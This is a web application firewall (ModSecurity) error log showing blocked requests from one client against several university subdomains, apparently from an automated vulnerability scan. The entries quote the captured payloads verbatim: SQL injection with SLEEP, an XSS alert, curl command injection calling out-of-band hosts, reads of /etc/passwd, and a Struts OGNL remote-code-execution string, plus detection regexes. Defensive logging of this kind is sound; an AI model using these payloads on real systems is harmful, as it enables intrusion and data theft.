[Tue Aug 29 11:33:46.361599 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KsCo-f0AAASEJPYAAAAE"]
[Tue Aug 29 11:33:47.315074 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAASFedEAAAAG"]
[Tue Aug 29 11:33:47.319514 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgjkf9wgdo69h81.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlUAAAAD"]
[Tue Aug 29 11:33:47.326785 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11K8Co-f0AAASDb6MAAAAA"]
[Tue Aug 29 11:33:47.360601 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgna1zbkzqywbmx.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlcAAAAD"]
[Tue Aug 29 11:33:47.369372 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAARo83QAAAAT"]
[Tue Aug 29 11:33:47.393691 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgn7jazkt5w53pt.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARjjRoAAAAL"]
[Tue Aug 29 11:33:47.404512 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg5e7ft96nnheow.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlkAAAAD"]
[Tue Aug 29 11:33:47.408152 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgfckxs13qysg8e.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARo83YAAAAT"]
[Tue Aug 29 11:33:48.311345 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASEJP0AAAAE"]
[Tue Aug 29 11:33:48.328801 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgymy7ttf5yb6zj.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARo83gAAAAT"]
[Tue Aug 29 11:33:48.335817 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAANsAlsAAAAD"]
[Tue Aug 29 11:33:48.346151 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARy-0MAAAAb"]
[Tue Aug 29 11:33:48.351581 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARo83kAAAAT"]
[Tue Aug 29 11:33:48.377536 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASEJQAAAAAE"]
[Tue Aug 29 11:33:48.385160 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgehk3tpa54qmur.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASAHdkAAAAH"]
[Tue Aug 29 11:33:48.394340 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgo3uou5xa15bzp.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARxOr4AAAAa"]
[Tue Aug 29 11:33:48.405169 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11LMCo-f0AAARo83sAAAAT"]
[Tue Aug 29 11:33:49.308138 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg4kd47ojozztgo.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARjjSEAAAAL"]
[Tue Aug 29 11:33:49.309225 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgko6zh8z8xjohx.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARy-0YAAAAb"]
[Tue Aug 29 11:33:49.312493 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgn6btmmmwd31wr.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAAR@KIQAAAAF"]
[Tue Aug 29 11:33:49.318992 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgeb5u1k1mcdm3h.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAASAHdoAAAAH"]
[Tue Aug 29 11:33:49.336077 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgm5g8jnxgxuhgb.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAARjjSIAAAAL"]
[Tue Aug 29 11:33:49.336221 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg3msm1qykdpkbc.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAANsAl4AAAAD"]
[Tue Aug 29 11:33:49.346818 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new 